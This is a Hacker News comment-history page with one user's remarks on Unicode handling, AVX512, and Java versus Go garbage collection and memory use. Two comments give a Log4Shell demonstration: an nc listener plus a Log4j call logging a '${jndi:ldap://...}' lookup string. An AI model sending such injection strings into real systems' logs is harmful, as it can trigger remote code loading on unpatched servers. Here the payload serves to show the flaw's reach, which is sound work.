Hacker Newsnew | past | comments | ask | show | jobs | submit | natanbc's commentslogin

Only on older CPUs, they started fusing off AVX512 on newer silicon batches (even on 12th gen)


Only in codepoints, but it still has the problem GP mentions of ` + e = è being two codepoints (so two elements in UCS-32), but being logically one character

https://manishearth.github.io/blog/2017/01/14/stop-ascribing...


This, it's pointless to have char32_t if you still need to pull several megabytes of ICU to normalize the string first in order to remove characters spanning over multiple codepoints. UTF32 is arguably dangerous because of this, it's yet another attempt to replicate ASCII but with Unicode. The only sane encoding out there is UTF-8, and that's it. If you have to always assume your string is not really splittable without a library, you won't do dangerous stuff such as assuming `wcslen(L"menù") == 4`.


I posted this in reply to a sibling comment, but the "correct" way is still vulnerable

Start nc (nc -lp 1234) and run this

    org.apache.logging.log4j.LogManager.getLogger("whatever").error("not safe {}", "${jndi:ldap://127.0.0.1:1234/abc}")


Thanks, didn't realise that. So the issue is deeper than misuse of user input (I've edited my post).


The RCE works with both ways, start nc (nc -lp 1234) and run this

    org.apache.logging.log4j.LogManager.getLogger("whatever").error("not safe {}", "${jndi:ldap://127.0.0.1:1234/abc}")


Well that’s just appalling.


> In a multithreaded program, a bump allocator requires locks. That kills their performance advantage.

Java uses per-thread pointer bump allocators[1]

> While Java does it as well, it doesn’t utilize this info to put objects on the stack.

Correct, but it does scalar replacement[2] which puts them in registers instead

> Why can Go run its GC concurrently and not Java? Because Go does not fix any pointers or move any objects in memory.

Most java GCs are concurrent[3], if you want super low pauses you can get those too[4][5]. Pointers can get fixed while the application is running with GC barriers

[1]: https://shipilev.net/jvm/anatomy-quarks/4-tlab-allocation/

[2]: https://shipilev.net/jvm/anatomy-quarks/18-scalar-replacemen...

[3]: https://shipilev.net/jvm/anatomy-quarks/3-gc-design-and-paus...

[4]: https://wiki.openjdk.java.net/display/zgc/Main

[5]: https://wiki.openjdk.java.net/display/shenandoah


I agree. The author seems to know quite a bit about Go and GCs, but doesn't seem to have much experience with Java. As a Java performance engineer, it sounds like he is comparing Go to how he thinks Java works based on what he's read about it.


Additionally he doesn't seem to know that much about C#, which also has advanced GC, while allowing for C++ like memory management, if needed.


It's odd how most people that haven't used a VM with GC are amazed by Go (no VM) and WASM (no GC) but still fail to understand that with a GC _AND_ VM you can code something that doesn't crash even if you make a big mistake!

And they haven't even bothered to try it out!

To use anything other than JavaSE/C# on the server you really need very good arguments!


Or being amazed by Go's compile speed, when Turbo Pascal and Object Pascal compilers were already doing that in the 1980's, or finding WASM innovative when polyglot bytecodes with no GC also go back to the early 1980's, like Amsterdam Compiler Kit EM as one example among many.


The innovation in WASM is more about getting all the major players in the browser space to agree and support it as a first-class citizen in the web stack. That polyglot bytecodes existed in the early 1980's does nothing for the web.


What a perfect example, have you even tried Java?

I'm guessing you are coding for the client?

C++ arrogance is the problem here.

About the pipe dream of WASM there are 3 problems:

1) Compile times (both WASM and the browser)

2) If you thought Applets where insecure (btw they wheren't) wait until the .js (also a VM with GC...) bindings that you are forced to go through to reach anything from WASM securely gets attention!

3) If you build for the browser you have Intel, Nvidia, Microsoft and Google (do you work there, might explain things) to deal with on Windows. You DON'T want that... use C to build for linux on ARM/RISC-V has to be one of your options and then all that work you spent on getting WASM to work is wasted. (because you won't have the performace/electricity/money for the cycles you need in the long term)

Edit: Please don't replace Python (that you should probably never have touched) with Go...


1) No one was realistically compiling C++ or Python to Java though. WASM is not new tech as the other poster said — it’s people coming together to support one compile target that also works on the web, which itself is the crowning achievement.

2) Building a secure VM is easy. You only need to give it access to things it should have access to. If a VM has only math instructions, it’s not going to access the file system. My computer can’t poke my nose because there is literally no machine instruction for it.

Java did not build its VM that way. Instead, the JVM had full access to everything and individual functions were blacklisted within Java applications and this was enforced by Java code running in the same machine as the attacker’s code. Naturally every blacklist works like a sieve.


When I think about it, the memory security is probably the weakest point of WASM and probably also the reason nothing of value has come out of that initiative yet.

How does WASM protect memory?

Or maybe there is something valuable made in WASM and I don't know about it, Figma is I think, but I'm not in the target audience.


Not to mention Turbo Pascal was compiling faster than Go, on a single-core, in-order 20Mhz PC...


With more advanced language features too.


Yep, Turbo Pascal 7.0 vs Go 1.0.


I just wrote some Go last weekend and the compile time was very slow. It reminded me of Scala. Any way I switched to Ruby and didn't have to deal with it any more. Turbo Pascal really was fast, but I don't see that in Go.


Scala and SBT are some of my biggest productivity killers. They murder my machine and take years to do compile.


> To use anything other than JavaSE/C# on the server you really need very good arguments!

Haha! Quoting this so you can't delete it.


Most programmers use PHP, Python, Ruby, Node.js which are all GC bytecode VMs.

What language are you imagining as an argument here?


C# makes it possible to do C (not C++) like memory management but it does not make it easy. Unsafe C# code is really, really, really unsafe, much more unsafe than equivalent C code, and does not compose well. It's improving, with Span/Memory, etc, but it remains an absolute last resort.


C and C++ memory managements are alike, C# doesn't need reference counted library types.

If you mean RAII, they can be easily done with IDisposable, using and Rosylin analysers that throw errors when usings are forgotten.

And yes, manually memory management should be last resource, proven by profiler data.


I do mean RAII, which is fundamental to C++. Memory management without it is not "C++ like".

IDisposable is not a substitute for RAII, and C# has nothing that can manage ownership in equivalent ways as it lacks deterministic destruction. Implementing, for example, a data structure based on unmanaged memory in C# in such a way that it can be safely used by code outside the library without undermining the safety of the language (i.e. without introducing the possibility of programming errors outside the data structure implementation causing leaks or memory corruption) is an exercise in discipline and requires a thorough understanding of the runtime - eg. knowing that an object can be garbage collected while a method on it is executing. I know this because I've done it (as a last resort after extensive profiling and production use of various optimised, managed versions of the library).


Maybe you should explore better Marshall Interop services and the span related improvements.

IDisposable is definitely an alternative when coupled with Roslyn analysis or SonarQube.

As if doing it in C++ doesn't require the same knowledge level, worse actually, as it also requires ISO C++ mastery and a good knowledge of how each compiler being used handle IB and UB.

Also unless static analysis is getting used, RAII can also get thr ownership wrong, specially with use after move errors, or smart pointers incorrectly given as arguments.


I used Spans extensively. They help (mostly by providing efficient bounds checking), but not much. The main problem, as I mentioned initially, is the composability of this sort of code.

I wasn't trying to give some kind of defence of C++ here, just pointing out the dissimilarities to C#. This particular piece of code would have been far easier in C++ and RAII would have been a huge help, but the system as a whole would have been an utter nightmare in C++ (which I know because I've worked on multiple similar systems in C++).


Sure, but I am the opinion it does compose, if one embraces it isn't the same as writing C++ in C#, not trying to downplay your experience on the matter.

For example, here are the Roslyn analysers for a more RAII like experience with IDisposable,

https://github.com/DotNetAnalyzers/IDisposableAnalyzers

Turn "DISP004-Don't ignore created IDisposable." into a compiler error and you have your region allocated RAII like experience.

And moving a bit the goal posts, for those scenarios where C# fails completly to provide a usefull solution, we can rewrite just that module into C++ (preferably C++/CLI when only Windows matters), and have the best of both languages.


There's also ref which is almost like pointers and safe. Span/Memory do not remain an absolute last resort, they are becoming the standard way for string formatting/parsing/(de)serialization and IO.


I didn't say Span/Memory are a last resort, I said C style memory management (AllocHGlobal/Free), despite being somewhat improved by Span/Memory, remains an absolute last resort. Span/Memory aren't primarily aimed at handling unmanaged memory, though they're useful for it.


Of course C style memory management is a last resort, 99% of devs don't need it, and the 1% that actually need it, better learn to use V-Tune.


why is it more unsafe than equivalent C code? I always thought it's simply a way to enable C-like real pointers/native memory ...


"Scalar replacement" explodes the object into its class member variables and does not construct a class object at all. That does result in the exact same `sub %esp` (that Go would do for any struct), but it is restricted to only working if every single usage of that class type is fully inlined and the class is never passed anywhere that needs it in its object form.

It's worse than what Go has. Go can stack-allocate any struct and still pass pointers to it to non-inlined functions.


Scalar replacement does not work even in very trivial cases: https://pkolaczk.github.io/overhead-of-optional/

In all those cases, Optionals were inlined, didn't escape, yet they haven't been properly optimized out.


Did you understand why?


I don't know the exact reason here, but from my experience JVMs don't seem to perform optimisations as deep as static compilers. You can see the compiler not only missed scalar replacement here, but also didn't use a conditional move to avoid branching neither it performed any loop unrolling. Maybe it is because JITs are constrained by time and resources a lot more.


It'd be worth doing a deep dive into this - you can look at the compiler's intermediate representation to understand why it didn't make an optimisation. There may be something trivial getting in the way.


Scalar replacements (as currently implemented in Java) does not work in real-world programs.

Well-written code does not need it. Poorly written code can not trigger it, because the JIT is too dumb and isn't getting better.

There is no sane test to determine whether a piece of code will be inlined in Java. In practice anything more complex than byte array is unlikely to be inlined. Even built-in ByteBuffers aren't! Meanwhile Go compiler treats Go slices just as nicely or better than arrays.


The JIT is getting better. Major escape analysis upgrades are a big part of where Graal (a drop-in replacement for the HotSpot JIT) gets its performance boosts. EA definitely does work well there because Truffle depends on escape analysis and scalar replacement very heavily. GraalVM CE is better than regular HotSpot at doing it and GraalVM EE is even better again.


Graal effort is over 10 years old.

Jaotc, — Graal's sole mainstreamed part, — has been recently removed from OpenJDK in 17th release, and Oracle says [1], that they are "considering the possibility of using C2 for ahead-of-time"

1: https://mail.openjdk.java.net/pipermail/discuss/2020-Novembe...


It’s almost as if graal and openjdk are separate projects with different use cases. Also, they are not competing (in the usual meaning) since both are developed by Oracle.


Which JIT? There are plenty of them to choose from across Java implementations.


ZGC[4] in particular has me excited, enough so to want to pick up a JVM language.


ZGC and Shenandoah can be slower than G1, those are not silver bullets. The fact that there is 4-5 GCs explains the situation, there is not a single GC that is better than the others.

It really depends of the workload.


Indeed. It is strange that no official JDK document puts pros/cons of GCs packaged with standard JDKs in some kinda easy-to-read table/matrix.


Well, unless latency is explicitly a problem with the default (G1) GC, it probably should not be changed to begin with. It is a beast of a GC with a very good balance between throughput and latency. Also, if the latter is problematic, the first thing should be to fiddle with the singular G1 knob (one should set, unless they really know what they are doing), target pause time — throughput and latency are fundamentally opposing goals.

G1 by default has low enough pauses as well, but it does increase with the speed of garbage creation. But it handles even ridiculously high throughputs with graceful degradation of pause times.

Here is a really great blog on various aspects of modern GCs (and don’t forget that we are at Java 17, with small but significant GC updates in each version): https://jet-start.sh/blog/2020/06/23/jdk-gc-benchmarks-remat...


Right it is all good. As I said how difficult it would for official document to put out a comparison table. A comparison around latency/throughput/Heapsize/Cost(Mem/CPU) should be reasonable enough for developers to choose right GC for their applications.


ZGC is already available, since JDK 15, September 2020. =)

https://wiki.openjdk.java.net/display/zgc/Main#Main-ChangeLo...


Max pause times of 0.5ms is what got me really interested.

It feels like a huge trade-off of GCs is almost completely gone.

https://malloc.se/blog/zgc-jdk16


> It feels like a huge trade-off of GCs is almost completely gone.

FWIW the tradeoff of low latency GC is usually paid in throughput.

That is definitely the case for Go, which can lag very much behind allocations (so if your allocation pattern is bad enough the heap will keep growing despite the live heap being stable, because the GC is unable to clear the dead heap fast enough for the new allocations).


throughput can be fixed by adding compute. latency cannot. always optimize for latency with gc.

and no the heap will not keep growing in golang. it'll force threads to help with GC if its falling behind. thereby reducing the rate of allocations and speeding up the collection.


Random Go dev suddenly more of an expert than the literal best-in-class GC experts that have been working on G1GC, ZGC, Shenandoah, Parallel, ConcMarkSweep and others.

GCs are a matter of tradeoffs. Always optimizing for latency is Go's solution, but there are reasons for everything. It's the very reason why the JVM has so many knobs. Yes, it requires a PhD to know what to tune, but there are many parameters for the thousands of different situations that can arise.


rolls eyes I've tuned java's GC for highly available and massive throughput systems.

pretty familiar with the trade offs. java's problem isn't GC (in general) its problem is memory layout and the fact it can't avoid generating a metric shit ton of garbage.

G1GC was a good improvement and I stopped paying attention at that point because I no longer had to deal with its problems (left the ecosystem).

I'm not asserting java hasn't improved or that its GC implementations aren't modern marvels. fundamentally they're just a self inflicted wound.

golang wouldn't benefit anywhere near as much as java has from these implementations because guess what... they've attempted GC that operate under similar assumptions, young allocations, compacting patterns, etc. and they failed to make an improvement that just increasing the heap size knob wouldn't fix using the current GC.


> it can't avoid generating a metric shit ton of garbage.

IMHO this is an often-overlooked aspect of Java and I get flak for pointing out that Java programs are often full of defensive copying because the Java style encourages it. The JDK is very trashy and highly biased against reusing objects or doing anything in-place without creating garbage. You can't, for example, parse an integer out of the middle of a string.

15 years ago when I wrote a lot more Java, I could get away with avoiding JDK libraries to write tight and small Java code (yeah, omg, mutable non-private fields). That was how I got my AVR microcontroller emulator to beat its C competitors. Nowadays if you write that kind of code you get a beatdown.

JVMs work really hard to deal with trashy Java code. Generics make everything worse, too; more hidden casts and adapter methods, etc.


Only in some kinds of apps, like web servers where all the heavy lifting is being done by the database anyway.

Consider a compiler. It's not infinitely scalable to multiple cores. It may not even be multi-threaded at all. It also doesn't care about pause times - for that you want Parallel GC.


depends on the compiler and language. golang seems to counter point your position quite handedly. having one of the fastest compile times and being highly concurrent.

if your application is so simple it doesn't use concurrency then 99% of the time you can completely remove the need for GC by preallocating slabs.


The Go compiler is fast because it doesn't do very much, not because Go's GC is good for throughput oriented jobs.

Go has repeatedly tied itself in knots over the years because they have a goal of not making the compiler slower, yet, the GC needs of the compiler are diametrically opposed to the needs of the HTTP servers Go is normally used for.

https://go.dev/blog/ismmkeynote

"As you can see if you have ROC on and not a lot of sharing, things actually scale quite nicely. If you don’t have ROC on it wasn’t nearly as good ... At that point there was a lot of concern about our compiler and we could not slow down our compilers. Unfortunately the compilers were exactly the programs that ROC did not do well at. We were seeing 30, 40, 50% and more slowdowns and that was unacceptable. Go is proud of how fast its compiler is."


For a compiler, the GC strategy that makes most sense is to never deallocate. The compiler is going to die shortly. No need to do the bookkeeping of figuring out how to deallocate before that happens.


There's still a memory tradeoff, some due to GC, some due to Java (lots of runtime reflection...). Guessing 2-4x.


This is a bit of a tangent, but you can get into situations where Java's memory-overhead becomes pretty untenable. I was in a situation of having to keep track of ~1 billion short strings of a median length of maybe 7 characters.

In terms of just data, that should clock in at about 10 Gb; in practice it was closer to 24 Gb. I tried going with just byte[]-instances instead, which didn't help a lot. Using long byte[]-instances and indexing those doesn't help as much as you'd think because they get sliced up into small objects behind the scenes.

I ended up memory mapping blocks of memory and basically implementing my own append-only allocator.


FWIW. This would probably present a challenge in most (all?) languages.

For example in libc++ due to SSO an std::string has a minimum size of 24 bytes.

For a billion strings less than 15 chars (+ the null byte) that gets you to 24GB, and that’s optimistically assuming each string is allocated in place.

I doubt heap allocated char* would do much better either. Just having a billion 8 byte pointers eats a lot of memory. You’d really need some sort of string packing scheme similar to what you did in Java.


It's a lot easier to build custom allocators in C++ though.

For one, Java has a maximum mmap-size of 2 Gb, and as a cherry on top of that turd, you have no control over their lifecycle. The language is very clearly not designed for this type of work, and if you try to make it do it anyway, it fights you every step of the way.


It has nothing to do with the language but with the API / VM capabilities.

Both those restrictions are fixed, granted that this is not yet in the offical API, it's an incubation module (the equivalent of from __future__ of Python).

https://docs.oracle.com/en/java/javase/17/docs/api/jdk.incub...


The foreign memory API which is currently incubating should help with most of these limitations: https://openjdk.java.net/jeps/419


Right - specifically they invented a way to make closing an mmapped segment safe and fast. The reason you can't officially (without private APIs) unmap something in current Java is because if you did then other threads would segfault, and "no segfaults" is kind a defining characteristic of Java. The new API fixes this using more VM magic, so closing a mapping from one thread will cause other threads to throw exceptions, but this is done without sacrificing performance (it doesn't require checking a status every time you read from memory).


The Lilliput project aims to address this: https://wiki.openjdk.java.net/display/lilliput


I would never write something like this in java, but to be fair, a program shouldn't be written like this in the first place. If you "need" a billion strings in memory and you didn't design for that with something that would scale better, you messed up a long time ago.


Huh, I didn't really have a problem solving the problem as it came up. Like many scaling problems, it wasn't a problem until it was. Then I fixed it. Now I have a solution that can deal with ten times as many strings as before. If I grow out of that one, I'll come up with a better design.

I could have gotten 10 times as much hardware instead, but that would be an incredible waste of money compared to just spending a few days writing more hardware-efficient code.


I have addressed similar problems using a typed array of contiguous memory and another array of lengths.


I did try exactly that, but the GC overhead was still prohibitively high for my use case, made because big arrays in practice are composed from shorter non-contiguous arrays to make garbage collection even remotely possible.


Hmmm, if the typed array only contains primitives, the GC isn't looking inside the array. If the thing pointed to, can never contain a pointer, it won't need to be scanned.


A factor of 2.4 is extremely unlikely to be what makes the difference between a program being viable and not. You have to be in an extremely fine-tuned situation for that to make the difference, and unless your usage level is unusually static it's probably only going to make the difference for a few weeks or months.


So for some context, I'm running a search engine on consumer hardware. Coaxing power out of limited hardware is sort of my bread and butter. How many of these strings I can keep in memory limits how many documents I can index. Doubling that number is quite significant.

This number is orthogonal to how many searches I can serve, that is already a solved problem (through similar craftiness). Multiple searches per second sustained load is fine. The search engine has held up to the hacker news front page, which is something many supposedly non-interactive sites struggle with.

This is a non-profit operation, so unless someone just decides to pay me a months salary or two, I'm not able to meaningfully increase the hardware. I'm stuck with what I've got and will make the most of it.


The time of someone who can do that kind of crafty tuning is almost certainly worth more than the hardware. If nothing else, I'd think having you do a week or two of consultancy and buy more hardware with the proceeds would be more efficient in terms of getting things done. (I appreciate that nonprofits have a lot of particular constraints that mean that that's probably not a practical way forward).


Playing a devil's advocate here: a use case might already be hitting the maximum per server RAM.

A factor of 2.4 might mean 2.4 times more hardware. You might need 240 servers instead of 100.


Sure. And? Everything that you need to do to manage 240 servers, you need to do to manage 100 servers. Like I said, if you're in the scaling stage then you'll be getting to 240 in a few months either way, so you need to be ready for it. 2.4x higher operating expenses matter eventually, when you're a mature organisation, but if the software is under active development you almost certainly have higher priorities.


Also, throughput. But latency and throughput are almost universally opposite ends of the same axis — that’s why it’s great that Java allows for choosing a GC implementation.


you can fix throughput problems by adding compute resources, you can't fix latency issues. I'll always pick a GC that optimizes latency over throughput. its easier to maintain the software.


The GC memory overhead affects all languages with a GC more advanced than refcounting. It certainly does affect Go as well.


It does for multi-codepoint characters (such as the rainbow flag): https://play.rust-lang.org/?version=stable&mode=debug&editio...

Elixir gets it right: https://replit.com/@natanbc/reverse


Yeah, another commenter mentioned grapheme-clusters, though apparently there's a readily available crate that adds support: https://stackoverflow.com/questions/58770462/how-to-iterate-...

According to this they added it to the standard library at one point but then broke it back out because the lookup tables were too large



Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: